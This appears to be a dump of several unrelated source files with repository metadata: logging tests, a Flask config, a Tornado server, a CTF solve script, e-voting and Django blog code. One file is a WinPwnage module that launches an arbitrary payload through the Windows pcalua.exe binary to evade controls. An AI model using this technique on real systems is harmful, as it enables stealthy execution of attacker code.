WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright (C) 2013 CERN
"""
import logging
import os
import shutil
import unittest
import mtb.log as log
from mtb.test import parametrized
LOG_OPERATIONS = "debug info warning error critical".split()
TEST_DIR = os.path.abspath("test_tmp")
class LogTest(unittest.TestCase):
    """ Test :py:mod:`mtb.log` utilities module. """

    def setUp(self):
        """ Setup the test environment for the log test. """
        # remove the test folder
        shutil.rmtree(TEST_DIR, True)
        # and create it again
        try:
            os.mkdir(TEST_DIR)
        except OSError:
            # directory already exists (or cannot be created); proceed
            pass

    def tearDown(self):
        """ Restore the test environment and delete the test folder. """
        shutil.rmtree(TEST_DIR, True)

    # Runs once per (name, system) pair from mtb's LOG_SYSTEMS registry.
    @parametrized("log_n log_s".split(), log.LOG_SYSTEMS.items())
    def test_init(self, log_n, log_s):
        """ Test log system creation. """
        print("running log setup for %s" % (log_n,))
        extra = dict()
        if log_n == "file":
            # the file backend needs an explicit log-file destination
            extra = {
                "handler_options": {
                    "filename": os.path.join(TEST_DIR, "file.log"),
                }
            }
        log.setup_log("foo", log_n, extra=extra)
        print("...test log setup ok")

    @parametrized("log_n log_s".split(), log.LOG_SYSTEMS.items())
    def test_log_operations(self, log_n, log_s):
        """ Test log system operations. """
        print("running log operations checking for %s" % (log_n,))
        extra = dict()
        if log_n == "file":
            extra = {
                "handler_options": {
                    "filename": os.path.join(TEST_DIR, "file.log"),
                }
            }
        log.setup_log("foo", log_n, extra=extra)
        logger = logging.getLogger("foo")
        # exercise every level: debug/info/warning/error/critical
        for operation in LOG_OPERATIONS:
            getattr(logger, operation)(
                "log test for %s.%s" % (log_n, operation))
        print("...test log operations checking ok")
if __name__ == "__main__":
unittest.main()
|
[
"massimo.paladin@gmail.com"
] |
massimo.paladin@gmail.com
|
ccb882729d998d9bdbd004437f7c994f0bd18d99
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_carapaces.py
|
aad4bf46fdd13e735a62e205495271cc39b6a7e0
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from xai.brain.wordbase.nouns._carapace import _CARAPACE
#class header
class _CARAPACES(_CARAPACE, ):
    """Wordbase entry for the plural noun "carapaces"; a thin
    specialisation of the singular _CARAPACE entry."""

    def __init__(self,):
        """Initialise the base entry, then set this word's own metadata."""
        super(_CARAPACES, self).__init__()
        self.name = "CARAPACES"
        self.basic = "carapace"
        self.specie = 'nouns'
        self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
dbcb8bc5dd9ddbaa524afa2cdafe4606a9a7a19c
|
901f0b1d571959f5ee1c777ce61d1a1c9785454d
|
/winpwnage/functions/execute/exec_pcalua.py
|
0228940f634376d7302ba736e852c539aa2be1dd
|
[] |
no_license
|
0x556c7472614861636b6572/WinPwnage
|
2236847153e2b43968e3c43e3f1fbf9e4b762a1c
|
81d89c75a9718944071ca64390ee16bc33e1c958
|
refs/heads/master
| 2020-05-23T08:54:52.447104
| 2019-05-15T00:34:22
| 2019-05-15T00:34:22
| 186,697,927
| 1
| 0
| null | 2019-05-14T20:46:38
| 2019-05-14T20:46:38
| null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
import os
import random
from winpwnage.core.prints import *
from winpwnage.core.utils import *
#https://lolbas-project.github.io/lolbas/Binaries/Pcalua
# Technique metadata consumed by the WinPwnage framework's scanner.
pcalua_info = {
    "Description": "Executes payload using the Program Compatibility Assistant",
    "Id": "2",
    "Type": "Execution",
    "Fixed In": "99999",   # sentinel: not fixed in any known build
    "Works From": "7600",  # minimum Windows build number
    "Admin": False,        # no elevation required
    "Function Name": "exec_pcalua",
    "Function Payload": True,  # exec_pcalua takes a payload argument
}
def exec_pcalua(payload):
    """Launch *payload* via pcalua.exe (Program Compatibility Assistant),
    a living-off-the-land execution proxy.

    Returns False on any failure; the success path returns None,
    after printing a success message.
    """
    if payloads().exe(payload):
        paths = []
        binary = "pcalua.exe"
        print_info("Searching for ({binary}) in system32 and syswow64".format(binary=binary))
        # Collect every pcalua.exe found under system32/syswow64.
        for root, dirs, files in os.walk(information().windows_directory()):
            for name in files:
                if name.lower() == binary:
                    if "system32" in root.lower() or "syswow64" in root.lower():
                        paths.append(os.path.join(root, name))
        try:
            # random.choice raises IndexError when no copy was found.
            path = random.choice(paths)
        except IndexError:
            print_error("Unable to proceed, ({binary}) not found on system".format(binary=binary))
            return False
        else:
            print_info("Located ({binary}) binary".format(binary=binary))
        print_info("Attempting to launch {payload} using ({binary}) binary".format(payload=payload,binary=binary))
        # pcalua's -a switch runs the given application.
        exit_code = process().create(path,
            params="-a {payload}".format(payload=payload),
            get_exit_code=True)
        if exit_code == 0:
            print_success("Successfully created process ({}) exit code ({})".format(payload, exit_code))
        else:
            print_error("Unable to create process ({}) exit code ({})".format(payload, exit_code))
            return False
    else:
        print_error("Cannot proceed, invalid payload")
        return False
|
[
"noreply@github.com"
] |
0x556c7472614861636b6572.noreply@github.com
|
e566a3c7c5a3d65eebf04460db5857973c435e42
|
0d1c4ec8784f51be781772dca19278efaf3eb2b4
|
/config.py
|
a9851244be12c076e1389f5b77813a3f80e17c71
|
[
"MIT"
] |
permissive
|
borko81/flask_with_orm
|
0ddaa663454eadfb15acb8cc52cdb4b41063b1b5
|
72d677419fc859acf4a56850a9d96b4b33127956
|
refs/heads/main
| 2023-08-16T13:27:36.509612
| 2021-09-27T12:42:12
| 2021-09-27T12:42:12
| 408,812,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
import os

# Directory holding this config module; used to anchor the SQLite file.
basedir = os.path.abspath(os.path.dirname(__file__))


class Config(object):
    """Flask / SQLAlchemy settings, overridable through the environment."""

    # Session-signing secret; falls back to a development default.
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guest'
    # Database connection string; defaults to a local SQLite file.
    SQLALCHEMY_DATABASE_URI = (
        os.environ.get('DATABASE_URL')
        or 'sqlite:///' + os.path.join(basedir, 'app.db')
    )
    # Disable the modification-tracking signal machinery.
    SQLALCHEMY_TRACK_MODIFICATIONS = False
|
[
"bstoilov81@gmail.com"
] |
bstoilov81@gmail.com
|
fbc658b8bd1b68d8329f5058d093752c0b3149eb
|
20bbd17aec6ffe08d36e5e98c841585c40b3c3e8
|
/.history/main_server_20180718180933.py
|
2f584b591dd8b06903ee6ffd5f4b71cee075f23b
|
[] |
no_license
|
NickCongyuLiu/minieye-cpu-master
|
e29c699fe1cd65ea0b6081c2fb8b51b864ea8b27
|
a0b4a6d5bd2df976b825fe6565bb62d1f74c665b
|
refs/heads/master
| 2020-03-23T21:18:54.998888
| 2018-08-10T09:58:32
| 2018-08-10T09:58:32
| 142,097,251
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,589
|
py
|
#coding=utf-8
import tornado.web
import tornado.ioloop
import tornado.httpserver
import tornado.options
import os
import datetime
import time
import json
from tornado.web import RequestHandler
from tornado.options import define, options
from tornado.websocket import WebSocketHandler
define("port", default=1213, type=int)
class ChatHandler(WebSocketHandler):
#建立websocket连接
def open(self):
self.write_message("connected")
def data_cleaning(self,origin_data):
info = origin_data.split("\n")
CPU_temp = []
CPU_one_freq = []
CPU_two_freq = []
CPU_timeStamp = []
CPU_power =[]
# lane_alg_fps =[]
# lane_fps=[]
# vehicle_alg_fps=[]
# v1_process_fps=[]
data_set = []
# read_info = []
takeOrNot=False
for line in info:
if ('Output info' in line):
takeOrNot = True
elif ('Input info' in line):
takeOrNot = False
elif ('timeStamp' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip()[0:13])
data_set.append([meta_data])
elif ('mtktscpu :' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip())
data_set[-1].append(meta_data)
elif ('CPU#0:' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip())
data_set[-1].append(meta_data)
elif ('CPU#4:' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1][1:6])
data_set[-1].append(meta_data)
elif ('current power =' in line):
if(takeOrNot):
meta_data = int(line.split('current power =')[1].strip()[0:4])
data_set[-1].append(meta_data)
elif ('lane.alg_fps' in line):
if(takeOrNot):
meta_data = line.split('lane.alg_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
# 脏数据
if(meta_data_arr[0] =='fps'):
data_set.append([int(meta_data_arr[1][0:13]),float(meta_data_arr[2]),'lane_alg_fps'])
else:
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'lane_alg_fps'])
elif ('lane.fps' in line):
if(takeOrNot):
meta_data = line.split('lane.fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'lane_fps'])
# data_set.append((line.split('lane.fps')[1].strip().split(' ')))
elif ('vehicle.alg_fps' in line):
if(takeOrNot):
meta_data = line.split('vehicle.alg_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'vehicle_alg_fps'])
elif ('v1.process_fps' in line):
if(takeOrNot):
meta_data = line.split('v1.process_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'v1.process_fps'])
data_set.sort()
mess = json.dumps(data_set,ensure_ascii=False)
self.write_message(mess)
return 'hello'
    # Handle an incoming websocket message
def on_message(self, message):
if(message[0:4]=="file"):
mess = message[4:]
mess = self.data_cleaning(mess)
else:
mess = "verybad"
# self.write_message(mess)
    # Called when the websocket connection is closed
def on_close(self):
print('connection closed')
pass
    # Allow cross-origin requests
def check_origin(self, origin):
return True
# Entry point: configure and launch the Tornado websocket server.
if __name__ == '__main__':
    tornado.options.parse_command_line()
    # Single websocket route; static/template dirs resolved relative to this file.
    app = tornado.web.Application([
        (r"/chat", ChatHandler),
    ],
    static_path = os.path.join(os.path.dirname(__file__), "static"),
    template_path = os.path.join(os.path.dirname(__file__), "template"),
    debug = True
    )
    http_server = tornado.httpserver.HTTPServer(app)
    http_server.listen(options.port)
    # Blocks forever serving requests.
    tornado.ioloop.IOLoop.current().start()
|
[
"Liucongyu1993@yahoo.com"
] |
Liucongyu1993@yahoo.com
|
41929e1c80c40f72ea1272f059348c5d40882d5b
|
faa1a9f8bfa60c6f3c1543ddf5c01ea8d6ec5898
|
/BalsnCTF-2019/reverse/vim/solve.py
|
152bb17d4a19d61ca5a51bb5db34279ca7fe63c5
|
[] |
no_license
|
LJP-TW/CTF
|
afe0873029072da256b591c96a0b2a97df6644b2
|
f9c30cf270130120bfe4ddf957299fb60ddf8c27
|
refs/heads/master
| 2023-05-27T17:08:56.579815
| 2023-05-22T10:33:42
| 2023-05-22T10:33:42
| 123,657,738
| 30
| 5
| null | 2023-05-22T10:32:56
| 2018-03-03T04:08:05
|
Smali
|
UTF-8
|
Python
| false
| false
| 3,313
|
py
|
# coding: utf-8
# In[6]:
from sympy import Matrix, pprint
import codecs
from collections import defaultdict
import numpy as np
def func1(lst, lng):
    """Combine two 16-value blocks in the cipher's 1-based mod-32 encoding.

    ``lst`` is first transposed as a 4x4 block; each output element is a
    sum (mod 32) of four products computed by repeated addition, where a
    stored value v encodes the residue (v - 1).
    """
    # Transpose the row-major 4x4 block.
    transposed = [lst[row + col * 4] for row in range(4) for col in range(4)]
    out = []
    pending = []
    for base in range(4):
        for idx, val in enumerate(transposed):
            # acc = ((val - 1) * (lng[...] - 1)) mod 32, with the repeat
            # count capped at 31 just like the original loop bound.
            steps = val - 1
            acc = 0
            for _ in range(31):
                if steps > 0:
                    steps -= 1
                    acc = (acc + lng[base * 4 + idx % 4] - 1) % 32
            pending.append(acc + 1)
            # Every four partial products fold into one output value.
            if len(pending) == 4:
                total = pending[0]
                for term in pending[1:]:
                    total = (total + term - 1) % 32
                out.append(total)
                pending = []
    return out
def solveP(fun1_res, Q):
    """Recover P from F = func1(P, Q) by inverting (Q - 1) modulo 32.

    Values are stored 1-based (v encodes (v - 1) mod 32); sympy's
    ``inv_mod`` supplies the modular matrix inverse.  Intended inverse of
    ``func1`` — the round-trip is checked later in this script.
    """
    m = 32
    fun1_res = np.array(fun1_res).reshape((4, 4))
    Q = np.array(Q).reshape((4, 4))
    # (P - 1) = (Q - 1)^-1 @ (F - 1)  over Z_32
    PT = np.matmul( Matrix(Q - 1).inv_mod(32) , fun1_res - 1) % m
    P = (PT + 1) % m
    return list(P.reshape(16))
def shift(y):
    """One mixing step over the 1-based mod-32 encoding.

    Equivalent to three doubling steps on y plus a rounded-up quarter of
    y, all folded back into the 1..32 range.
    """
    # quarter = ceil(y / 4) via two rounded halvings.
    quarter = y
    for _ in range(2):
        if quarter % 2 == 1:
            quarter += 1
        quarter //= 2
    # Three doublings in the shifted representation.
    result = y
    for _ in range(3):
        result = (result * 2 - 2) % 32 + 1
    return (result + quarter - 2) % 32 + 1
# Tabulate shift() over 0..31 and build the reverse lookup.
# Note: shiftMap[0] is immediately overwritten inside the loop, so the
# seeded 0:0 entry effectively survives only in revShiftMap.
shiftMap = {0:0}
revShiftMap = {0:0}
for i in range(32):
    the = shift(i)
    shiftMap[i] = the
    revShiftMap[the] = i
def func2(X, Y):
    """Chain-combine two 16-value streams through shiftMap (1-based mod 32).

    Each output depends on the previous output and the shifted values of
    the paired inputs; the chain is seeded with 1.
    """
    chained = [1]
    for a, b in zip(X, Y):
        step = (chained[-1] + shiftMap[b] - 2) % 32 + 1
        step = (step + shiftMap[a] - 2) % 32 + 1
        chained.append(step)
    return chained[1:]
def solveY(X, V):
    """Invert func2: recover Y given X and the combined output V."""
    prev = 1
    recovered = []
    for x, v in zip(X, V):
        # Undo the x contribution, then the chained previous output.
        undone_x = ((v - 1) % 32 - shiftMap[x] + 2) % 32
        y_shifted = ((undone_x - 1) % 32 - prev + 2) % 32
        recovered.append(revShiftMap[y_shifted])
        prev = v  # the next step chains off the untouched output value
    return recovered
# Map each shifted rot13 value (ord(rot13(ch)) % 32 + 1) back to the
# candidate characters that produce it; 0 maps to underscores so the
# flag printer below always has a 4th candidate to pick.
ans_dict = defaultdict(list)
for i in range(128):
    ans_dict[ord((codecs.encode(chr(i), 'rot_13')[0])) % 32 + 1].append(chr(i))
ans_dict[0] = ['_','_','_','_']
# In[13]:
# Self-test: encode a known plaintext, run the forward pipeline, and check
# that solveP / solveY invert each stage before attacking the real answer.
padding = 'Welcome_to_th1s_'
flag = 'qristuvwxezabcde'
table2 = list(ord(c) % 32 + 1 for c in codecs.encode(padding + flag, 'rot_13'))
print("trying solveP")
print("original answer:", table2[:16])
print("solved answer:",solveP(func1(table2[:16], table2[:16]), table2[:16]))
X = func1(table2[:16], table2[:16])
Y = func1(table2[16:32],X)
my_ans = func2(X,Y)
print("trying solveY")
print("original answer:", Y)
print("solved answer:", solveY(X, my_ans))
print("trying reversing my_ans")
solved_Y = solveY(X, my_ans)
P = solveP(solved_Y, X)
print("original answer:", table2[16:32])
print("solved answer:",P)
for i in P:
    print(ans_dict[i][3], end="")
print()
# In[14]:
# Attack: presumably the captured target values; the second assignment
# overrides the first (each entry is the first's value + 1).
answer = [23, 30, 17, 21, 26, 7, 22, 3, 1, 18, 4, 17, 2, 10, 21, 9]
answer = [24, 31, 18, 22, 27, 8, 23, 4, 2, 19, 5, 18, 3, 11, 22, 10]
print("trying reversing answer")
solved_Y = solveY(X, answer)
print(solved_Y)
P = solveP(solved_Y, X)
print(P)
s = ""
for i in P:
    s += (ans_dict[i][3])
print(f"Balsn{{{s}r}}")
|
[
"accr94238@gmail.com"
] |
accr94238@gmail.com
|
39459b8873611c5c979305418444f396736eae9c
|
7d3a2fbc85f0d9a9f80bfda0b0fa72bbaae42e67
|
/replace.py
|
cc857cce6259da367b906501a2dfe0eb7bd52531
|
[] |
no_license
|
saif21/Blockchain-e-voting
|
b7e88d7bb924c823b22559507858fb46399f2cd4
|
c7da0064033afb47a572c830d3f7a43dc0a3c0a6
|
refs/heads/main
| 2023-06-09T19:37:04.360329
| 2021-07-01T17:18:02
| 2021-07-01T17:18:02
| 381,299,737
| 0
| 0
| null | 2021-06-29T09:36:47
| 2021-06-29T08:51:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,408
|
py
|
from sql import ReplaceData, VoteDatabase
import json
from database import db, cursor, db1, cursor1, db2, cursor2, db3, cursor3, db4, cursor4, db5, cursor5
# longest_chain = chain
# smaller_chain = self.get_chain()
# Shared DB helper used by Replace below for all block-table writes.
replaceBlock = ReplaceData()
class Replace():
    """Consensus helpers: detect blocks orphaned by a chain replacement and
    rewrite every node's block table with the winning (longest) chain."""
    def __init__(self):
        # Blocks from the losing fork; populated by get_orphan_block().
        self.orphan_block = []
    # obtaining orphan block
    def get_orphan_block(self, longest_chain, smaller_chain):
        """Return the suffix of smaller_chain that diverges from longest_chain.

        Blocks are compared by their proof value; the first mismatching
        index marks the fork point and everything from there on is orphaned.
        """
        self.longest_chain = longest_chain
        self.smaller_chain = smaller_chain
        for i in range(len(self.smaller_chain)):
            if self.longest_chain[i]['proof'] != self.smaller_chain[i]['proof']:
                # Bug fix: the old loop kept reassigning on every mismatch,
                # so only the suffix after the LAST mismatch survived; the
                # fork point is the FIRST mismatch.
                self.orphan_block = smaller_chain[i:]
                break
        return self.orphan_block
    # obtaining orphan block votes and add to orphan DB
    def add_to_orphanDB(self):
        """Persist every vote carried by the orphaned blocks."""
        if self.orphan_block:
            for block in self.orphan_block:
                # NOTE(review): orphan blocks are read with key 'vote' here,
                # while the rewrite helpers below read 'votes' — confirm the
                # block schema is consistent.
                replaceBlock.add_vote_to_orphan_DB(block['vote'])
    def _rewrite_blocks(self, longest_chain, cursor, db, writer):
        """Clear one node's block table and rewrite it from longest_chain.

        `writer` is the ReplaceData.update_blockN callable for that node.
        Consolidates the five formerly copy-pasted update_block_dbN bodies.
        """
        self.longest_chain = longest_chain
        self.sql1 = ("DELETE FROM block")
        cursor.execute(self.sql1)
        db.commit()
        for block in longest_chain:
            writer(block['index'], block['previous_hash'], block['proof'],
                   block['timestamp'], json.dumps(block['votes']))
    def update_block_db1(self, longest_chain):
        """Rewrite node 1's block table with the longest chain."""
        self._rewrite_blocks(longest_chain, cursor1, db1, replaceBlock.update_block1)
    def update_block_db2(self, longest_chain):
        """Rewrite node 2's block table with the longest chain."""
        self._rewrite_blocks(longest_chain, cursor2, db2, replaceBlock.update_block2)
    def update_block_db3(self, longest_chain):
        """Rewrite node 3's block table with the longest chain."""
        self._rewrite_blocks(longest_chain, cursor3, db3, replaceBlock.update_block3)
    def update_block_db4(self, longest_chain):
        """Rewrite node 4's block table with the longest chain."""
        self._rewrite_blocks(longest_chain, cursor4, db4, replaceBlock.update_block4)
    def update_block_db5(self, longest_chain):
        """Rewrite node 5's block table with the longest chain."""
        self._rewrite_blocks(longest_chain, cursor5, db5, replaceBlock.update_block5)
# DB accessor shared by LongestChain for loading each replica's blocks.
vote = VoteDatabase()
class LongestChain():
    """Select the longest chain among the five replica databases."""
    def __init__(self):
        # Raw block rows per replica, loaded eagerly from the vote DB helper.
        self.evote1 = vote.loadblock1()
        self.evote2 = vote.loadblock2()
        self.evote3 = vote.loadblock3()
        self.evote4 = vote.loadblock4()
        self.evote5 = vote.loadblock5()
        self.evote1_chain = []
        self.evote2_chain = []
        self.evote3_chain = []
        self.evote4_chain = []
        self.evote5_chain = []
    def get_chain(self, chains):
        """Convert raw DB rows into block dicts (JSON 'data' -> 'votes')."""
        self.chains = chains
        self.chain = []
        for row in chains:
            self.chain.append({
                'index': row['id'],
                'previous_hash': row['previous_hash'],
                'proof': row['proof'],
                'timestamp': row['timestamp'],
                'votes': json.loads(row['data']),
            })
        return self.chain
    def longest_chain(self):
        """Return the longest replica chain (last one wins on ties)."""
        self.evote1_chain = self.get_chain(self.evote1)
        self.evote2_chain = self.get_chain(self.evote2)
        self.evote3_chain = self.get_chain(self.evote3)
        self.evote4_chain = self.get_chain(self.evote4)
        self.evote5_chain = self.get_chain(self.evote5)
        candidates = [self.evote1_chain, self.evote2_chain,
                      self.evote3_chain, self.evote4_chain, self.evote5_chain]
        best_len = max(len(chain) for chain in candidates)
        # Preserve the original tie-break: the last maximal-length chain wins.
        return [chain for chain in candidates if len(chain) == best_len][-1]
|
[
"noreply@github.com"
] |
saif21.noreply@github.com
|
2153ab647e3fd3822a2c8871f0a832841d873c3c
|
2d2ba03f4c4bbe1ec93d997d23b162f753462181
|
/helios_lib/crypto/utils.py
|
c58aa896c821dd268f1d3f309d0341c431bb52a7
|
[
"MIT"
] |
permissive
|
omidraha/helios_lib
|
1192f3926f409e9d0d047c8008c116331b07159f
|
0f62824a4b2d4dbe6a9b5decffd59cf7d5b299df
|
refs/heads/master
| 2020-04-02T09:26:02.151320
| 2018-11-12T10:07:32
| 2018-11-12T10:07:32
| 154,292,657
| 0
| 0
|
MIT
| 2018-10-23T08:37:40
| 2018-10-23T08:37:39
| null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""
Crypto Utils
"""
import base64
import json
from hashlib import sha256
from helios_lib.exceptions import JsonLoadParserError
def hash_b64(s):
    """
    Hash *s* with SHA-256 and return the base64 digest with the trailing
    "=" padding removed (the docstring previously said sha1; the code has
    always used sha256).

    Accepts bytes; str input is now UTF-8 encoded first, since hashlib
    requires a bytes-like object on Python 3.
    """
    if isinstance(s, str):
        s = s.encode('utf-8')
    digest = sha256(s).digest()
    # A 32-byte digest base64-encodes to 44 chars with exactly one "="
    # pad, so stripping padding matches the old blind [:-1] behaviour
    # while actually doing what the comment promised.
    return base64.b64encode(digest).rstrip(b'=')
def to_json(d):
    """Serialize *d* to compact JSON with deterministically sorted keys."""
    compact = (',', ':')
    return json.dumps(d, sort_keys=True, separators=compact)
def from_json(json_str):
    """Parse *json_str*; empty/None input yields None, malformed JSON is
    re-raised as the project's JsonLoadParserError."""
    if not json_str:
        return None
    try:
        return json.loads(json_str)
    except ValueError:
        raise JsonLoadParserError
|
[
"or@omidraha.com"
] |
or@omidraha.com
|
bec123799a98b6a447f713cfda3bd0c097b107c5
|
7fd95d9a8d9a82e177264ead50b06c9b4dc7b7a4
|
/blog/views.py
|
b2ea38000b1c5d366a6dadf764cac0e2c2dba30e
|
[] |
no_license
|
NielleLopes/djangogirls
|
547ab450be42cc33aa9f16e8848ca3720c1d141a
|
b9d9c71cf61d3c73c3768cac2f5191b288eeade8
|
refs/heads/master
| 2020-11-24T07:28:52.459945
| 2019-12-14T20:48:33
| 2019-12-14T20:48:33
| 228,030,126
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
from django.shortcuts import render
from django.utils import timezone
from .models import Post
# Create your views here.
def post_list(request):
    """Render the post list: published posts, oldest first."""
    # Bug fix: the queryset was computed but never passed to the template,
    # so the page always rendered with an empty context.
    posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
    return render(request, 'blog/post_list.html', {'posts': posts})
|
[
"voce@exemplo.com"
] |
voce@exemplo.com
|
826a2431497d442f827dfbae44156952aa5d84a8
|
c773734730cbb434080cef954e949fc69f9a9852
|
/daemon.py
|
b8cfac880adc75f070e34bd3d66416c1dc11df77
|
[] |
no_license
|
zjr/GitHookDaemon
|
de19e1605cf6735ffd21bb904b97bf0a0ecd58eb
|
00524beac612c3d115e31c3061d5c4fc22294a76
|
refs/heads/master
| 2020-06-02T22:43:20.279887
| 2013-03-12T23:40:26
| 2013-03-12T23:40:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,784
|
py
|
#!/usr/bin/env python2.7
import sys
import os
import time
import atexit
from signal import SIGTERM
class Daemon:
    """
    A generic daemon class.
    Usage: subclass the Daemon class and override the run() method
    """
    # NOTE: Python 2 only — relies on the builtin `file()` and the
    # `except OSError, e` syntax, both removed in Python 3.
    def __init__(
        self,
        pidfile,
        stdin='/dev/null',
        stdout='/dev/null',
        stderr='/dev/null'):
        # Path of the pidfile plus the streams the daemon's stdio is
        # redirected to (default: fully detached via /dev/null).
        self.pidfile = pidfile
        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
    def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write(
                "fork #1 failed: %d (%s)\n"
                % (e.errno, e.strerror))
            sys.exit(1)
        # decouple from parent environment
        os.chdir("/")
        os.setsid()
        os.umask(0)
        # do second fork
        try:
            pid = os.fork()
            if pid > 0:
                # exit from second parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write(
                "fork #2 failed: %d (%s)\n"
                % (e.errno, e.strerror))
            sys.exit(1)
        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = file(self.stdin, 'r')
        so = file(self.stdout, 'a+')
        # bufsize 0 => unbuffered, so error output appears immediately
        se = file(self.stderr, 'a+', 0)
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())
        # write pidfile
        atexit.register(self.delpid)
        pid = str(os.getpid())
        file(self.pidfile, 'w+').write("%s\n" % pid)
    def delpid(self):
        """Remove the pidfile (registered via atexit in daemonize())."""
        os.remove(self.pidfile)
    def start(self):
        """
        Start the daemon
        """
        # Check for a pidfile to see if the daemon already runs
        try:
            pf = file(self.pidfile, 'r')
            pid = int(pf.read().strip())
            pf.close()
        except IOError:
            pid = None
        if pid:
            message = "pidfile %s already exist. Daemon already running?\n"
            sys.stderr.write(message % self.pidfile)
            sys.exit(1)
        # Start the daemon
        self.daemonize()
        self.run()
    def stop(self):
        """
        Stop the daemon
        """
        # Get the pid from the pidfile
        try:
            pf = file(self.pidfile, 'r')
            pid = int(pf.read().strip())
            pf.close()
        except IOError:
            pid = None
        if not pid:
            message = "pidfile %s does not exist. Daemon not running?\n"
            sys.stderr.write(message % self.pidfile)
            return # not an error in a restart
        # Try killing the daemon process
        try:
            # Send SIGTERM repeatedly until the process disappears and
            # os.kill raises OSError ("No such process").
            while 1:
                os.kill(pid, SIGTERM)
                time.sleep(0.1)
        except OSError, err:
            err = str(err)
            if err.find("No such process") > 0:
                if os.path.exists(self.pidfile):
                    os.remove(self.pidfile)
            else:
                print str(err)
                sys.exit(1)
    def restart(self):
        """
        Restart the daemon
        """
        self.stop()
        self.start()
    def run(self):
        """
        You should override this method when you subclass Daemon.
        It will be called after the process has been daemonized by
        start() or restart().
        """
[
"me@zjr.io"
] |
me@zjr.io
|
1f53791c6367f2212e2ada3d469cfcabe175a760
|
b9ae6375b98ffae9b2d38fd7e34453ca1946fb9e
|
/epsilon/views.py
|
4d265106990f88e33c782d89148dc4b73978a552
|
[
"MIT"
] |
permissive
|
atlednolispe/blog
|
93f4f68922f640dab5a954b7c3218d532e012ee6
|
d3926e424d544f3e9a3805b16a15072ac6c6a780
|
refs/heads/master
| 2022-12-13T23:16:29.145704
| 2018-02-28T08:37:43
| 2018-02-28T08:37:43
| 120,314,098
| 0
| 0
|
MIT
| 2022-11-22T02:13:02
| 2018-02-05T14:16:48
|
CSS
|
UTF-8
|
Python
| false
| false
| 2,393
|
py
|
# import logging
from django.core.cache import cache
from django.views.generic import ListView, DetailView, TemplateView
from blog.views import CommonMixin
# from blog.test_util import time_it
from comment.views import CommentShowMixin
from .models import Post, Tag
# logger = logging.getLogger(__name__)
class BasePostView(CommonMixin, ListView):
    """Shared listing configuration for all post list pages."""
    model = Post
    template_name = 'solid_state/elements.html'
    context_object_name = 'posts'  # templates iterate over `posts`
    paginate_by = 3
    ordering = '-id'  # newest first
class IndexView(TemplateView):
    """Static landing page."""
    template_name = 'aerial/index.html'
class PostIndexView(BasePostView):
    """Post listing with optional `?query=` title search."""
    def get_queryset(self):
        """Filter the base queryset by a case-insensitive title match."""
        query = self.request.GET.get('query')
        qs = super().get_queryset()
        if query:
            qs = qs.filter(title__icontains=query)
        return qs
    def get_context_data(self, **kwargs):
        """Expose the current search term to the template."""
        query = self.request.GET.get('query')
        # Bug fix: **kwargs were previously dropped, losing any context
        # supplied by the caller; forward them alongside the query term.
        return super().get_context_data(query=query, **kwargs)
class CategoryView(BasePostView):
    """Posts filtered to a single category (category_id from the URL)."""
    def get_queryset(self):
        category_pk = self.kwargs.get('category_id')
        return BasePostView.get_queryset(self).filter(category_id=category_pk)
class TagView(BasePostView):
    """Posts attached to one tag; unknown tag ids yield an empty listing."""
    def get_queryset(self):
        try:
            tag = Tag.objects.get(id=self.kwargs.get('tag_id'))
        except Tag.DoesNotExist:
            return []
        return tag.post_set.all()
class PostView(CommonMixin, CommentShowMixin, DetailView):
    """Post detail page; every GET also updates the view counters."""
    model = Post
    template_name = 'solid_state/generic.html'
    def get(self, request, *args, **kwargs):
        # Render the page first, then record the view.
        response = super().get(request, *args, **kwargs)
        self.pv_uv()
        return response
    def pv_uv(self):
        """Increase pv/uv counters, throttled per (session, path) via cache.

        A page view is counted at most once per 30 s and a unique view at
        most once per 24 h for a given session+path; requests without a
        session cookie are skipped entirely.
        """
        # self.object.pv += 1
        # self.object.uv += 1
        # self.object.save()
        sessionid = self.request.COOKIES.get('sessionid')
